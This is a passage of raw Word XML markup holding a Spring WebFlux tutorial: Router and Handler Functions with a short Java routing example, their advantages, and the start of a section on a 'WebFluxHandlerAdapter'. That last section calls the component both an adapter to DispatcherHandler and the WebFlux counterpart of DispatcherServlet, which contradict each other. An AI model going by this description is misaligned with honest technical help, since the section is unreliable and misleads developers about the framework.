          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Router Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>route</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (URL, HTTP method, etc.) and tells Spring WebFlux which </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handler Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be called when a specific route is matched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE39E53"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handler Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> processes the request and returns the appropriate response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D905F" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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Example Combining Both:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD86B85"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Here is a more complete example where both Router Functions and Handler Functions are used together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A1B372"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DE612"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public class RouterConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03200939"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E8A86"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE52712"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public RouterFunction&lt;ServerResponse&gt; route(MyHandler handler) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118E023"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return RouterFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425B8FA2"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route(RequestPredicates.GET("/hello"), handler::handleHello)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2096D"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andRoute(RequestPredicates.GET("/goodbye"), handler::handleGoodbye);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5070B0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150004D4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5FA47" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="121F57A7"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57725DAF"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public class MyHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980EF5E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426BDF76"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public Mono&lt;ServerResponse&gt; handleHello(ServerRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F688470"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return ServerResponse.ok().bodyValue("Hello, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD9CF9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6BBF98" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A1FA78"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public Mono&lt;ServerResponse&gt; handleGoodbye(ServerRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1295AD"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        return ServerResponse.ok().bodyValue("Goodbye, World!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304DDA5"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB7EDF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FF8B7"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466546F1"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RouterConfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines the routes using RouterFunctions.route() for /hello and /goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F69D0"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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class defines the actual logic to respond to those routes (handleHello and handleGoodbye).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B1760"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When a request is made to /hello, handleHello in MyHandler will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C63EF"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Similarly, for /goodbye, handleGoodbye will be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7142D284" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07"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Advantages of Router Functions and Handler Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92F430"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Declarative Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Router functions allow for a clear and concise way to define routes without relying on annotations, which can make the routing configuration easier to understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE8E02"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Functional Style</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach promotes a functional style of programming in Spring WebFlux, which aligns well with the reactive nature of WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268AC1E3"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Separation of Concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The router handles routing and the handler handles the logic, providing a good separation of concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CEF2B"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Composability</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Router functions can be easily composed using methods like .andRoute(), allowing you to build complex routing structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B005F6" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE170D5"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Router Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> define the routing logic, mapping requests to handler functions based on URL patterns and HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B25347" w14:textId="77777777" w:rsidR="00B13E07" w:rsidRPr="00BF46DF" w:rsidRDefault="00B13E07" w:rsidP="00BF46DF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handler Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> process the requests and return the appropriate responses (Mono or Flux), which is the reactive way of handling data in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C8F816"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97DBD11">
          <v:rect id="_x0000_i2283" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE234D7" w14:textId="5332E586"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497" w:name="_Toc196307977"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p w14:paraId="3E62E2E0" w14:textId="2DF50EDA" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an important component that acts as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatcher</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for processing incoming HTTP requests. It is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used to handle requests by invoking the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handler functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A68523" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2"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Key Points about WebFluxHandlerAdapter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E80C7"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Request Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF563E" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebFluxHandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for adapting the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a handler that processes HTTP requests) to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is the central dispatcher for routing and processing HTTP requests in WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088C5D6C" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It is essentially a Spring WebFlux version of </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Instead of dealing with a traditional servlet-based model, it uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive model</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8A3FF"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8241B" w14:textId="77777777" w:rsidR="00AC4AF2" w:rsidRPr="00A0015D" w:rsidRDefault="00AC4AF2" w:rsidP="00A0015D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Its main job is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatch requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (such as the handler function or controller) and then </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0015D">
